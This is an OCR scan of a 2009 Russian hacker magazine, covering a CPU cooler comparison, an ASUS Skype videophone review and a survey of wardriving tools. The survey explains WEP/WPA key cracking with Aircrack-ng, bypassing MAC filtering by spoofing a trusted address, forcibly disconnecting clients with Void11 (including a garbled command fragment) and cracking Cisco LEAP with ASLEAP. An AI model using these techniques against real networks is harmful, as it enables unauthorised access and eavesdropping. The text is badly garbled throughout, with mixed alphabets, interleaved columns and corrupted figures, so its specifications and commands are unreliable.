КоличествотеПЛО8ЫХтрубок: 5 Материал подошвы. медь

Диаметр тепловыпрубок, MM~ 6 Количествотепловых трубок: 4

Диаметр вентилятора, мм: 120 Диаметртепловыхтрубок, мм: 8
Скоростьвращения вентилятора,об/4ИН: 1000-2000 ДиаfАетр вентилятора, мм. ЗХ 120 (в комплект не входят]
Уровень шума: 19-32 дБ Скорость вращения вентилятора, об/мин- п/а
Поток воздуха, CFM: 55.6-ВО.1 Уровень шума: n/a
Поддержка PWM. нет Поток воздуха, CFM· /па
Габариты. мм . 125Х105Х150 Поддержка PWM п/а
Вес, Г: 79В Габариты, мм 146Х126Х161

••••••••• 0
Начнем с плюсов. Во-первых, технология НОТ [Неаtрtре-Оlгесt- Touchl,
суть которой состоит в том. чТо тепловые трубки подходят как раз к
плоскости контакта процессора и радиатора Это улучшаеттеплообмен
в саМИА куле ре Основание радиатора выполнено из меди, а вентилятор
устройства имеет девятьлопастей. Скорость их вращения изменяется
8 пределах от 850 до 1650 об/мин Iчто, вообще говоря, противоречит
официальным данным). Крометого, на радиатор можноустаНО8итьеще
один, дополнительный вентилиор В комплекте скулером идеттюбик с
термопастой Такая щедрость для подобной цены' .. По ТТХхарактерис­
тики термопасты таковы: теплопроводность более 75 Вт/(м*К], тепловое
Вес, г· 790
••••••••••
•
Кулер оказался лучшим среди рассмотренных в тесте Всего 36 градусов
при обдуве одним [11 радиаТОР04 диаметром 120 мм - это очень сильный
результат Вместе с радиаТОРОfА никаких вентиляторов В комплекте нет
(хотя есть посадочные места аж для четырех), но зато присутствует IFX-1 О
- дополнительный радиатор для охлаждения обратной стороны сис­
темной платы Мы установили на радиатор IFX-14 одну 120 мм вертушку
Antec Tr'iCoollEO и, тем не менее, получили наилучшие результаты.
На IFX-1 О также есть кулер, хотя во время 'геста мы его ВЫКJIючали, чтобы
оценить именно процессорный охладитель.

СОПРОтивлениеменее 0.06 К/Вт - Очень неплохо. ведь термопаста на

25% состоит из серебра.
Представляется сомнительными полезность и удобность IFX-l О, пос­
кольку использовать его можно далеко не всегда. Намного логичнее
Из fАИНУС08замечен сильный шум на больших оборотах. выглядел бы хороший вентилятор на кулере.

ХАКЕР 06/116/09 ~ 019

T'hermaLright Xite:nce Black
Ultra-120 eXtreme Hawk Edition
Техническиехарактермстмки:

Техническиехарактеристмки:
Поддерживаемые процессоры: AMD SocketAM2/AM2+/939/940/754.

Поддерживаемые процессары: АМDSОСkеtАМ2/АМ2+.lпtеl LGA775/

InlelLGA77

LGА1,з66 !с помощьюдоп. аксессуара)

Материал подошвы: медь

Материал подошвы: медь Количествотепловых трубок' 6

Количество тепловых трубок: 6 Диаметр тепловых трубок, мм: 6
Диаметртепловыхтрубок,мм:6 Диаметр вентилятора, мм. 120
Диаметр вентилятора, мм: 120 (в комплект не входят] Скорость вращения вентилятора. об/мин' 1800
Скорость вращения вентилятора, об/мин:· Уровень шума. 2здБ
Уровень шума: п/а П атак воздуха, С FM 78.31
Поток воздуха, CFM. п/а Поддержка PWM да
Поддержка PWM· п/а Габариты, мм: 155х143х144
Габариты, мм: 63Х132Х161 Вес, Г: 876
Вес, Г: 790

••••••••• 0
••••••••••

Эта модель от Тhегmаlгight конструктивно схожа с IFX-14: такой же ТеПЛООТ80Дэтой м одел и улучшен посредством шести 8-миллимеТРО8ЫХ
массивный теплообменник, те же теплаотводные трубки Последние тепловыхтрубок. Еще одним плюсом является гидродинамический
соединены с корпусом пайкой, что улучшает общуютепловую проводи­ подшипник,установленныйв '120 мм вентиляторе, который. кстати, за­

мость. В «плюсы» также отнесем и большую площадь ребер радиатора креплен на радиаторе при помощи резиновых креплений. Это позволяет
В тесте устройство показала результаты, схожие с покгэателями IFX- 14 с погасить ненужные механические колебания. Есть возможность регули­

одним вентилятором. ровки стрости вращения кулера с Г10МОЩЬЮ PWM.

В комплекте имеются крепления на Iпlеl LGA775 и АМD SocketAM2+, Результат устройства в тесте нас приятно удивил - температура не под­

однако этим производителирешили неограничиваться Дополнительна нялась выше 40 градусов Г10 Цельсию!

можно приобрести переходники под LGA1366, АМD Socket 939 и Iпtеl Еще одним немаловажным преимуществом стала цена, а также то, что

Хеоn. На официальном сайте они доступны по цене $1 О [у нас, соответс­ модел ь может работать Г1рактически с любым современным процессо­
твенно, будут стоитьдороже). ром. Теплопроводности хватит даже на самые горячие камни

н а кулере нет собствен наго вентилятора. Вдобаво к могут воз н икнуть

-
Нет креплений под LGA 1366lвпрочем, это не очень серьезный недоста­
проблемы при установке из-за, прямо скажем, не самых маленьких ток, ведь мы рассматриваем модели. в основном Г1редназначенные для

габаритов Г1роцессоров от АМD).

Уровень шума на максимальной частоте ['1800 об/мин) высоковат - 23 дБ
при создаваемом потоке в 78.31 CFM

~ 020 ХАКЕР 06 /1261 09

 ~~~.'''~)'':':~:~)' './" '" ".

. " , , ,

» fet-num'

Zerotherm Noctua
ZEN FZ11 20 NH-C12P
Технические характеристики:

Технические характеристи ки,: Поддерживаемые процессары: AMD Soc'ketAM2/A'M2+, l,лtеl'LGА775/

Ilоддерживаемые процессары: IлtеlLGА775.АМD SocketAM2/ LGА1з66 (с помощьюдол. аксессуара!

АМ2+/939/940 Материал подошвы: медь

Материал подошвы, медь Кол и чество те пловых трубок. 6

Кол и чество тепловыхтрубок: 4 Диаметр тепловыхтрубок, ММ: 6
Диаметр тепловых трубок. мм' 6 Диаметр вентилятора, ММ: 120
Диаметр вентилятора, мм: 120 Скорость вращения вентилятора, об/мин: 1300
Скорость вращения вентилятора. об/мин: 1100-1800 Уровень шума: 12.6дБ

Уровень шума . 19.5-31.4дБ Поток воздуха, CFM: 92.3

Поток воздуха. CFM. 59.48 ПОРАержка PWM: нет
Поддержка PWM:Aa Габариты, мм: 114Х126Х152
Габариты, мм: 126х61Х156 Вес, г: 730
Вес, r 670
• • • • • • • • 00
• • • • • • • • 00

Эта система охлажденияпостроена по ставшейуже классическойсхеме: Каркасом всей конструкциислужат шесть тепловыхтрубок, при ЭТ0>4 сто­

на медном радиаторе вертикальнорасположенвентилятор. Соединение ит заметить, что ребра радиатора крепятся прямо к площадкесоприкос­

выполнено при помощи четыреХ'геl1ловыхтрубок,при этом использова­ новения с процессором Она, кстати, не совсем обычная. с дуговым риф­
лась пайка У ребер радиатора довольно необычнаяформа. На офици­ лением. Из разумных объясненийна ум приходитувеличениеплощади
альном сайте производителязаявляется, ЧТО'гакая форма увеличивает соприкосновениятермапасты и радиатора, но В таком случае надо оной

площадь поверхности.а. следовательно,ВОЗ~40жен более интенсивный
теплоотводв атмосферу. Вентиляторуправляемпри помощи PWM, при­
чем довольно легко Да и крепится без особых проблем - на АМ2+ встал
буК8альноза минуту Конечно. с Iпtеl'ом все будетпозаК08ыристее­
из-за подпружиненных креплений. устана8ливаемых с обратной стороны
платы. По части зффективности - результаты I~ормальные, однако ничего
выдающегося. Еще раз подтвердилось правило «цена - не показатель
качества».
всю нижнюю поверхностьрадиатора просто залить. На краяхлопастей
вентилятора им е ются зазубрины. Он и разделяютобраЗУЮЩ\о1есявихре­
вые потоки на более мелкие IуменьшаетуровеньШУ~4а). Кроме того, по
заверениям разработчиков,спектр шума расширяется,что делает его
менее надоедливым[говоря умными словами. при этом он приближен к
математическоймодели адд\о1ТИВНОГОбелого гауссова шума ... I. Шумит и
виБР\о1рует кулер реально очень слабо

При такой цене охлаждение могло быть гораэдоболее эффективным.

Уровень шума Д080ЛЬНО существенный.

ВЫВОДЫ осноВной фун кцией - охлажден ием процес­ Ice Наттег IH-4405 - в его цену я сначала
Все модели по-своему хороши. Но у каждой сора - справилсяТhегmаlгight IFX-14. за что просто не поверил. Впрочем. остальные моде­
из них свои недостатки, и каЖДдЯ подходит заслуженно получает приз «Выбор редак­ ли также неппохи. Х

под разные задачи. ОДНё!КО лучше всего с ции». Лучшую покупку однозначно забирает

ХАКЕР 06 11261 Q9 ,~ 021

АЛЕКСЕЙ ШУВАЕВ

A~US ,
AIGu"rUSV1
ТЕХНИЧЕСКИЕ
ХАРАКТЕРИСТИКИ:
Дисплей: LCD 7", 800х480
KaMepa:VGA,640x480
Интерфейсы: Ethernet, 802.11 b/g
Габариты: 202 х 12Зх25З мм
Вес 1,6кг

~ 022 ХАКЕР 06 /126/ 09

 Пользоваться Skype становиться, так же привычно, как обладать со­
товым телефоном. Интернет-теле'Фония обладает массой достоинств:
"
она бесплатна, хорошее качество звука и изображения, возможность
обмена текстовой информацией или файлами, доступность телекон­
ференций. Неудивительно, что компания ASUS решила предложить
нам еще один девайс для связи с абонентами без использования ком­
пьютера.

ЧТО ОН МОЖЕТ? гаджет, мы приступили к настрой­ пользоваться. Организовать можно по видеосвяэи - аффект­

Гаджет под именем ASUS AiGuru ке, Разговорс устройствомна телеконференцию тоже ~~ожно, но? Кроме того, такой девайс
SVl создан для разговоров при английскомязыке не вызывает но без мышки - тяжеловато. Еще крайне пригодится, если утебя
помощи интернет-телефонии от восторга, но в данной прошивке одно огорчение нас ожидало при имеется брат или сестра, крайне
Skype. Программа уже обрела русскогоязыка ,;е имелось. Введя загрузке списка контактов: все словоохотливые и имеющие

попу.лярность, а доступность ши­ логин и пароль [если утебя их нет, русские ники не отображались, как массудрузей в Сети. Чтобы он или
рокополосного интернета сделала тоты сможешыутжезарегис­ и присылаемые сообщения. На она не занимали компьютер, ты

С80е дело - теперь проще ДОЗ80­ трироватьсяl,~Ш принялись iial;HOM зтапе девайс совершенно просто подключаешь видеофон по
ниться кдругучерез интернет, чем названиватьзнакомым. Громкость не дружит С русскими шрифтами беспроводной связи и отправля­

ждать, пока он оторвется от компа динамика и чувствительность 'у нас был демонстрационный ешь родственничка в соседнюю

и найдетсвою трубу дo~~a. Неко­ микрофона порадовали,но мы образец, будем надеяться, что комнату: для тебя - возможн ость
торые пользовател и обзаводятся так И не встретили регулировки видеофон появится 8 продаже с спокойно посидеть перед компом,
web-камерами и тогда уже можно микрофона.А вот качество картин­ нормальной руссификациейl Раз а для нее или него - П080Д пох­

устраивать видео конференции. ки встроенной камеры откро­ уж м ы затронули тему управления вастаться новой игрушкой перед

Но все зто стаНО8иТСЯ недоступ­ венно разочаровало'при любом кнопками, то нельзя неупо~~януть друзьями. Ктомуже, ты можешь
ным, как только ты выключишь освещении и л юбых настройках об зргономике в целом Здесь всегда оставаться на связи, даже с

свой компьютер изображениеможно назвать не можно только порадоваться выключенным компьютером - мо­

Этот девайс - сам по себе не­ более, чем удовлетворительным, Устройство очень устойчивое, а жешь организовать консультации

большой компьютер, заточенный ТЫ можешь поигратьс ползунками панель СДИСГlЛеем наклоняется по Сети, а параллелыiO работать
под одну еДИНСТЕен ную задачу: яркости, контрастностии еще ОТI~осительно ОСI~ования. В самом на компьютере, не занимая окном

обеспечить удобство переговоров. задеЙСТВО8атьпяток других, но основании спрятан аккумулятор, скайпа драгоценную площадь

Встроенный динамик и микрофон это не особо помогает, Фокуси­ который обеспечивает не очень дисплея.

позволят обойтись без гарниту­ ровка не изменяется и придется длительную автономную работу.
ры, но при необходимости ты их довольствоватьсяустановками по Кнопок немного и все они доволь­ ИТОГ
сможешь подключить. КоличеСТ80 умолчанию. Попытка подключить­ но крупные, так что даже в темноте в качестве итога можем собрать
кнопок сведено к мини~~у~~у, так ся к роутеру по W,-Fi не увенчалась п ромахнуться будет сложно. все впе4атления и рассказать

что ты сможешь работать без успехом. Немного поразмыслив, о чувствах, которые вызывает

затруд·нениЙ. Дина ми к довол ьн О мы отключили шифрование и тог­ НАХОДИМ этот деваЙс. 8идеофон несет

громкий, а регулироватьуровень да девайс смог подцепиться. Но ПРИМЕНЕНИIE нам простоту коммуникаций не

звука ты сможешьдаже 80 время итутне все гладко прошло. даже Стильный и зргономичныйдевайс только голосом, но и при помощи

разговора. Кроме того, девайс при вкл Ю4енном О НСР гаджет не можно использовать [хотя и не на изображения. Работать стало
оснащен собственным аккумуля­ смог автоматически прописать полную катушку, как зто делается действительно легко и с этим

тором, и ты сможешь быть незави­ все адреса и пришлось зто делать на компьютереl. Но где же он мо­ спра8ИТСЯ даже твоя прабабушка,
симым от розетки около получа са вручную Вероятно,проблему жет найти свое применение? Если если ты все настроишь. Но есть
разговора. удастся решить с выходом новых ты приверженец ноутбуков, то некоторые недоработки, вроде

По функциям самой программы прошивок. После подключения врядли потерпишь на своем столе отсутствия поддержки шифро­

Skype ничего не изменилось: ты все заработало довольно стабиль­ нагромождение пластика и злек­ вания при подключении по Wi-Fi
также, как И прежде, можешь но и шустро. Но тут мЫ столкнулись тронной начинки. Если же утебя или невозможностиработы с
добавлять новых пользователей, с еще одной проблемой - набор стандартный десктоп, тотакже кириллицей.Кроме того, видео­
открывать чаты и организовывать текста Глядя на довольно крупный может не найтись места на столе. фон, основной функцией которого

телеконференции. дисплей, было бы логично пред­ Но когда в твоей организации является как раэ передача изоб­
положить, что он будет сенсорным, решат, что нужна свяэьдешевая, ражения, должен демонстриро­

НАЧИНАЕМ но зто не так. Все цифры, символы качественная иудобная, то вполне вать картинку если не идеальную,

ТЕСТИРОВАНИЕ и БУК8Ы приходится наб и рать можно вспом нить О видеофоне. то очень высокого качеСТ8а, чего

Включив девайс мы сразу же при помощи пятипозиционной Замечено, что директора и ТОП­ мы, к сожалению,не наблюдали,
решили подключиться к Сети. кноп ки Так что, если тебе надо менеджмент любят различные ус­ В остальном же, гаджетдовольно

Первымделом мы подключили добавить нового пользователя тройства, которые подчеркивают интересныйи будет пользоваться
ASUSAiGuru SVl по Еthегпеt-ин­ или сформировать список або­ значимость. Например, позвонить популярностью,особенно если
терфейсу. Обвязавшись кабелем нентов, то проще зто 6удетсд~лать секретарше и попросить кофе цена опустится хотя бы до трех
и установив на удобном месте с компьютера, а потом просто можно по обычномутелефону, а тысяч рублей. I

26/09 ХАКЕР 06 /'1261 09 ~ 023

{ ~'

"

» pc:_zone
"

Netstumbleг ' ~
www.stumbler.net
Определенно один из самых известных и лучших - -­ .
I
~-.IL\J Chaмelt МАе SSID I H:h"" I VendOl Т,''''' Еnс. .. ~
инструментов для вардрайвинга. У стемблера itJ··""
всего одна задача - обнаРУЖI1ТЬ в эфире точки
SSID.
ffi·~? Fiael~
@ 00045дЕВ4З61
О 00022DOECFI5
ieJr1'~rn
JGKAirPot-' net",...ork ,
6 Lilrk$Ys-
P,o><im {Ago..JORiNOCO
АР
АР
"'ЕР

@ОО601DIЕЗ~ОО i!9g, 1 P,O>Cim (Agm>/W.,.IJ>.N) АР WEP

доступа. считать SSID и за писать полученную О00ЗlJ05150Э0F JMI«Ai, ( 10 АР!'!& АР
@OOO22DOADA68 John TaybI 1 l'Io,im (Age,.j ORiHOCO АР WEP
информацию Е логфайл вместе с координатами,
® 00045АЕfЗ855 johп.linщ.. Э Unk'Y' АР WEP
если к програМ'Ае подключен приемник GPS. @ООЗ065026DЗВ Jon'$ Home 1 Apple АР WEP
После удачного вардраЙЕИНга информацию О @ООО22DОЗ7С57 JPAppje NetWOEk \IIreJers 9 P,,,,,,m {Ag-J OR;NDCO АР WEF
@О090480В358Е jflmoLм 6 ~ern(e!< АР WEF
найденных АР-шках месте с данными о местора­ @ 00О22DОD848З Кo'i>f'U,ell 3 Pt"';m (Age,e) OA;NOCO АР "'ЕР
сположении можно ЭКСПОрТИрОЕать Е lоg-файл, О 00045AD1Ef4D k.e:ndlick 6 LinksY$ АР

преобразовать его с помощью многочисленных

О 0002202DOCFO Кeyfl..!'ne SLeuon 7 l'Iот, (Дge,e) OANOCO АР J
конверторов в понятный Google'y формат KML и
@ 004005DЕDAЗF
000=278311
knoone\
К1а!tWОIk.~ Netwttk
,
6 O"LioIk
P,o><i" (А9О'е) ORiNOCC
АР
АР
WEP

@ОО6010FО2ЗОС k,fщ'sintemet 1 P,"';m 1~pe<e/Wa""lJ>.N) АР VJ<:P

за пару секунд отобразить все точки доступа на @ 00022DOC1AI4 LaGulIldJj 1 P<O>im ~g".) OR;NOCO АР VJEP
карте с помощью GoogLe Maps или декстопной ® 00022DЗ8821Ю ~щеп 1 Р"Юm IAge,e) ORiHOCO АР "'ЕР
® 0030651 ЕОССЗ LвAO\I 1 AP!'1o АР WEP
программы Google Earth О 00О2200DОЭ5С It'I>ny6 6 I'IО"n (ДgereJ ORD'lOCO АР
00002201<:8817 Lime: S'roke,agE: 10 Р,,,, .. (до...) ORNOCO АР
Для поиска ЖИЕЫХ точек доступа Netstumbler
О 0ОО45АЕDFСЭl 6n1ц]l$ 6 Unk"", АР
использует приемы активного сканирова­ О 00045АDАЗЕ6F Г~ 6 Unksуэ' АР

ния, Т.е. не просто прОСЛУLIJИЕаетэфир, но О 00О45А2Е1АО7 link,~ 6 linkf}l$ АР 1

I
О 00045'\OD465F ~nk,,.. 6 АР
и каждую секунду отправляет специальные ;, I
LnksJ's
.rJJ
фреймы. Надо сказать, что специфические КЛАССИЧЕСКИЙNETSTOMBLER
LС/SNАР-фреймы,сгенерированныестем­
блером, легко распознаЮ1'СЯ современными записать их координаты, но только под вин­ ганил GUI-интерфейс, в котором вывод
IDS-системам и. К тому же, а кти вное скан и ро­ дой И без I'iадежды получить какую-либо еще команды приводится В опрятный вид и
вание не поможет тебе Е поиске спрятанных ценную информацию. объединяется с информацией о расположе­
[hlddеп\ точек доступа, (впрочем сама под­ нии обнаруженных АР-шек, считывая ее с
борка информации не фонтан). Например, Vistumbleг текущими координатами GPS. Под никсами,
Netstumbler может распознать лишь факт www.vistumbler.net кстати, существуют аналогичные утилиты,

использования шифрования сети, не уточ­ Ну ХОРОшо, а как быть если на ноуте/нетбу­ которые парсят ВЫЕОД команды Iwlist.
НЯЯ какой именно механиэм используется. ке стоит Vista или WIП7? По правде говоря, Забавно, что Vistumbler написан с помо­
Вдобавок, программа наотрез отказывается возможность аКТИЕНОГО сканирования точек щью 1Улзы для аюоматизации различных

работать под V,stа'ой и вряд ли когда-нибудь доступа есть в самой с,",стеме Это делается с действий Autolt iПОДРОбнее о ней можеLIJЬ
это делать захочет В результате, получаем помощью консольной утилиты пеtsh: прочитать в статье «Пусть ОН все сделает
отличную программу, если нужно проска­ netsh wlan show леtwогks mode;bssid. сам!» в #]()7 ::x:1, позволяющей разработать
нировать эфир на наличие точек ДОС1Упа и Однако умелец Апdгеw Calcutt быстро свар­ приложения даже тем ЛЮДАМ, которые О про­

~ 024 ХАКЕР 06 /126/09

 , .

0Y",;;",t4';;;:-';;';".ml~-------_i..~::'r:o:;;;';;:=,''''---'''
- __ -.. -­ - - __ ее для поиска Wi-Fi спотов и определения
_~'J'II 1k!'?1I;­
"'.. . ~~­ _ .. н_ используемой ИМИ защиты.
,W
11

~
11
11
=:=::= .
....... mJ.IIOR:1»1

__
__
~ИI)
Oo:Jnд7t-l:::q
~w

~ w"
1'«Iш·
I#1/-Юt~
.....cn;

...."
Кismet
u
1J"'_ _

:~
Мo;j ..... iII'llп.h~

:=: ==
~"
~JI.t~J.!IЛjaoН/.l.L

::-У.М.
www.kismetwireless.net
, ~ __ ~l:бf;tмo' ~W"..,,""­
А это уже полноценное никсовое при­
~ ~_::f,«.0(J ~""'''..

...........
I

1
__

__
~=~аш

~_
~"'Ii'fi0'1

....
, ",.
ложение для поиска беспроводных сетей,
I
~Я"'J1

~~a.u.'I -...\11I­ ...

~ ~r,d.

)
J
"_O»J1OV~
~ ... _~........-M"
"'""""'"'1<\.,1; .....
.... снифинга, и даже обнаружения вторже­
! _.«-J.IAЦ~tI . . - _....
ний. Klsmet кардинально отличается от
Netstumbler и подобных ему тулз тем, что
для определения беспроводных сетей при­
меняет пассивное сканирование [ничего
граммировании толком никогда и не слыwа­ не вещая в зфирl. Причем используемые Сам набор состоит из нескольких утилит

""~I!-!!!'""" ли. При этом Vistumbler не просто работает. а
работает отменно, отображая помимо уровня
сигнала МАС-адрес вендора, используемую
систему шифрования и прочие пара метры
Данные о расположении Ha~дeHHЫX точек
можно «на лету» экспортировать в
формат и EJ реальном
методики позволяют оп ределить некоторую
информацию о клиентах. подключенных
к сети, а также найти скрытые (поп­
ЬеаСОПlпgl сети, правда. только В том слу­
чае если в них есть некоторая активность.
KML Kismet автоматическим может определить
BpeMeHtoI отсnежtolвать используемыедtolапазоны IP-аАресов. пере­
и включает alrodump Icнифер для сетей
802.11!, alreplay Iтулза для инжекции Wi-Fi
фреймов), аiгсгасk [взлом WEP и брутфорс
WPA- PSKJ. а также alrdecap [декодирова­
ние перехваченных WEP/WPA файлов). В
общем случае для взлома WEP необходимоr!!I:=;
определенное количество перехвачен­

их появления на карте через Google Eaгth. хватывая ТСР. UDP. ARP и DНСР пакеты, ных пакетов: как только будет захвачено

Для Bapдpa~BepOB полезно~ также окажется дампить трафик в формат для Wlreshark/ нужное количество фреймов, aircrack- пg
функция, с пщющью KOTOPO~ уровень сигнала TCPDump и даже определять примерное будет готова провести статическую атаку

обозначается с помощью различных звуковых расстояние до точки доступа (работа с GPS, на WЕР-ключ Сейчас Аlгсгасk-пg поддер­
фа~ЛО8. Справедливости ради стоит сказать, рдзумеется, поддержи ваеТС51 J. живает три способа для «восстаН08ления»

что в Netstumbler'e та:<же можно было про­ Примечательно, что после более чем 5 лет ключа

вернуть подобны~ трюк, но лtolwь при помощи разработки, создатели вот-вот порадуют нас • первый метод через PTW-аl'аку: основное
внешних скриптов совершенно HOBЫ~~ релизом. В частности, nреимущество заключается внебольшом
в конце мая вышла KIsmet-2009-05-RС1, в количестве перехваченных пакетов, необ­

inSSlDer которой был кардинально переработан интер­ ходимых для взлома WЕР-ключа Но метод

www.metageek.net/ фейс [по-прежнему используется псuгsеl, работает только с агр-пакетами, и это. есте­
products/inssider ствен но. большой недостаток,
PaccтpoeHHЫ~ тем фактом, что Netstumbler • второй вариант - через FMS / КогеК атаки.
не развивался несколько лет и не работает с Метод включает в себя различные статиче­
Вистой и даже 64-битной хр, Charles Рulпеу ские воздействия [FMS, КогеК, Вгutе [огсе)
решил написать свою собственную утилиту ДЛЯ поиска WЕР-ключа и требует больше
для поиска Wi-Fi ceTe~. после чего опу­ пакетов. чем в случае РТW-дтаки;

WЕР-КЛЮЧ НАЙДЕН: CAJRCRACK­

NGЭТО БЫЛО НЕСЛОЖНО

переделаны конфигурационные файлы,

добавлены новые опции для фильтрации
--. ОЧЕНЬ ПРОСТОЙ, НОУДОБНЫЙ ПЕРЕРАБОТАННЫЙ ИНТЕРФЕЙС
данных и новая система предупреждени~.
СТЕМБЛЕРПОД VISTA!WIN7 НОВОГО КlSMET'A, КОТОРЫЙ ВЫ­
оптимизирована загрузка процессора, прора­
ЙДЕТ СПУСТЯ 5 ЛЕТ РАЗРАБОТКИ
бликовал исходники на известном портале бота на система плагинов Что касается порта

The Code ProJect. Идею подхватил Norman для ви нды, ТО он есть, но реал изо ва н компа­ • трети~ вариант - подбор с использовани­

Rаsmussеп, после чего на свет появилась нией САСЕ и, увы, работает только со специ­ ем словаря (word [1st), используется, в основ­

новая версия IпSSlDег'а. построенная на альны~~и WI-FI адаптерами Сасе AirPcap. ном, для взлома WPA!WPA2 ключе~.

базе Natlve WI-FI API Инса~дер подобно Полноценная версия Аlгсгасk-пg суще­
Netstumbler использует активные методы Aircгack-ng ствует только для Linux, хотя на офици­
сканирования, а всю на~денную о точках aircrack-ng.org альном сайте доступна "недоверсия» для
доступа информацию отображает в табличке, Alrcrack-ng - полноценный программ­ винды. Разработчики честно предупре­
сдабривая данные красивыми графиками ный компле кс для взлома 802.11 WEP ждают, что для ее работы нужно самому
уровня сигнала. Тута очень простая - ниче­ IWlred Equivalent PrivacyJ ЕпсгурtlOП и доработать DLL конкретно для своего
го лишнего, но я нередко использую именно WPA/WPA2-PSK ключей для WIFi-сетеЙ. WI-Fi адаптера.

ХАКЕР 06/1261 09 ~ 025

 ...

----'~,

'Р_=
,.,.....
~~.-~i"o--·l
__0_ _1
H<!IldYI!le 10. _.. pci\'1en_lXffif.deY_l00t
Cat6;1uIoI.ionlD . .{FZ..зо6ЖВ·"21·ФОС·~.ВFВ3(FlD3ЭЕО}
МдC.Addl~n, ... ос).(:м;.sз.24~в.зз(Chщ;led)
cr..coS)tJI~lnc. [oo-cG-53)

Speed .....1 Gbps

SP!'~d .172e~e-".J'$
I
DHEP ' . .~~....d
Sp~d ... 08)'1«1.1

l"easeObl.ained . .5I2312OO912:5a.2GAМ
~=r=~1
TCPJlP . .En~d le.5ieE~es . .. &I6I2OOЭ 125а26АМ jJ
Qit.1Ыe I ~МAC I Di:М1eOHee! Re!t,)08IP I

БЕСПЛАТНАЯ УТИЛИТА ДЛЯ (МЕНЫ

ОТКЛЮЧИТЬКОГО-ТО ОТ БЕСПРОВОДНОЙ МАС-АДРЕСА ПОД ВИНДОЙ
СЕТИ? ЛЕГКО, ЕСЛИ ЕСТ'Ь ЕГО МАС-АДРЕС
~ info
Тулзы ДЛI1 работы

- с W,-F, есть для са ~ыx

разных устройств. Technitium
Если не брать в рас­ www.technitium.com
чет ко~~уникаторы Что удивительно, но фильтрация по МАС-адресам

и смартфоны,то по-прежнемуостается достаточно часто используемой

y~eCTHO упо~януть, защитой Впрочем, огранить доступ от случайных зевак

напри~ер, Р5Р. она дейстаитеЛЬНGс~ожет, а от вардрайверов_ ну, пускай

Созданныйдля него ребята балуются :1. ПодключитьсР. к таким АР в этом случае

Wifi5пiffегможно
скачать с сайта b.l1.Q;LL
Www,Р.2.р.:д.а.сks,сО 1 Тl/
fil(oL1~.7.
могут только клиеюы, которые занесены в список доверен­
ных ~ашин, Обойти же подобную защиту проще простого
- нужно лишь сменить МАС-адрес своего беспроводного
адаптера на доверенный. Подходящий МАС легко опреде­
лить все той же утилитой Airodump, перехватив пару naKe­
тоlЗ. Изменить МАС-адрес под никсами поможет утилита
mассhапgег, Что касается винды, то и тут существует нема­
ПРОНИКНОВЕНИЕВ CISCO
Vепdог [nроизводитель оборудования] покажет слово
CI5CO, нелишним будет вспомнить о протоколе авто­
ризации LEAP [Lightwelght ЕхtеПSIЫе Аuthепtiсаtiоп
Protocol), разработанном как раз-таки циско Проверить
догадки об исnользуемо,~ В сети протоколе ,~ожет

ло программ, в том числе платная 5МАС [VJWlN.klссопsultiпg, помочь снифер, который должен nоказать пакеты
пеt/sпо~сJ и бесплатная ТесhПltlum Обе требуют лишь REQUE5T, EAP-CISCO Wlreless [LEAP) Главная особен­
выбрать ceTe80~1 адаптер и указать для него желае,4ЫЙ ность LEAP состоит в том, что для авторизации нужен не
МАС-адрес, Убедись, что адрес успешно сменился (команда только пароль, но и имя пользователя' По умолчанию в
~ dvd iрсопflg /all в консоле) и попробуй установить соединение, Windows этот протокол не поддерживается, поэтому для
Упомянутые в статье К сожалению, с первого раза ты можешь легко обломаться, работы потребуется установить специальный клие~т ­
утилиты и x-tооlZ'bI поскольку овторизированныйклиент может быть уже под­ Аiгопе( Сllепt Utillties \llttр:l/гогsсhасh.СОПСОI'diа,r;а/пеgi
необязательнокачать ключен « сети, Выселить его олуда поможет все та же про­ гепооtе ассеSS/'о'.'iгеlеss/gепегаl info/acu.html]. А есть ли
из инета они будут грамма Voidl и деаутеН'Гифационныепакеты. смысл его устанавливать? Конечноl Несмотря на npo­
на DVD-диске думаннооь протокола, даже в нем обнаружили уязвимо­

voidl11 сти, позволяющие легко подобрать пароль с помощью

http://wi relessd efen се.О rg/Contents/ перехваченных пакетов LЕАР-авторизации. Первым это
Void11Main.htm пронюхал Joshua Wrrght - разработчик утилиты ASLEAP
Voidl1 используется для деаутентификации беспроводных [httр:Uаslеао.sоuгсеfог е r.\~\I, Эта утилита перехваты­
клиентов от точки доступа, или. проще говоря, для при­ вает сетевые пакеты при повторном коннекте клиента,

нудитель~IOГО отключения клиентов отточки ДОСlупа После
такого отключения беспроводной клиент будет автомати­
чески пыттьсI1 подключиться к точке доступа (повторить
ассоциацию). А при каждом повторном подключении будет
создаваться трафик, который нужен для подбора ключа, К
~ links тому же. можно отключить клиента, занять его МАС-адрес
Дистри5утщ!ыдля и таким образом обойти фильтрацию по MAC-aдpeca~~, К
wагdгiVlпg'а сожален и 10, средства Windows это не позволяют. зато фокус
Slitaz Аlrсгасk-пg легко реализуе~~ под никсами С помощью этой утилиты:
DistпЬutiоn:
после чего брутит пароли для идентификации.Утилита
работает нативно под LIПUХ'о,~, однако на официально,~
сайте есть версия программы И под винду !правда, не
самого последнего билда]
WIFIZOO
Раз воспользовавшисьутилитой Wif,ZOO, понимаешь,
насколько просто перехватывается различная инфор­
мация в открытых WI-F, сетях, Сама задача утилиты
- пассивно собирать различную информацию из сети,

htt Р :LL2.I.r::~ г.;э с1.:. voidllJ)enetration ··5 КЛИЕНТСКИЙ_~f.'\С -8 Написанная на Руthоп'е (8 основе, кстати rOBOpl1, лежит

119~ МАС_ТDЧКИ-ЦОСТУПА -о wlanO. программа 5сару, о которой ~ожно прочитать статью в

ph p?id~slitaz ЭТОМ номере), тулза позволяет извлечь из эфира массу
ВасkТгасk: AsLeap полезной для вардрайвера инфы и представить ее в виде

~Еш.Q..tg-еХRlоit, www.willhackforsushi.com/Asleap.html красивых графиков Это не Только данные о точках досту­

ОЛJ Если в ходе сканирования твой стамблер в колонке па [5510], но и информациР. об использующих их клиентах

.026 ХАКЕР 06 11261 09

••

~WlrelessKeyView ,:
Eile ~dit ~iew !::lelp

0ОI122ЗЗ445566778899ааЬЬссddееff()()" •
4е69725З6F66657231 З2333435 NirSofer 12345

[~key(s), 1 Selected I ШrSoft Freeware. http://www.nirsoft.net

WIRELESSKEYVIEW ПОМОЖЕТВОССТАНОВИТЬКЛЮЧИ
ДЛЯ БЕСПРОВОДНЫХСЕТЕЙ, СОХРАНЕННЫЕВ СИСТЕМЕ

[с указанием адресов отправки и назначе­ с полным анализом распространенных про­ L"L"~~~l-"U-""

;.q.­ -ff ~IJ____ -"р. -1:_'
':)

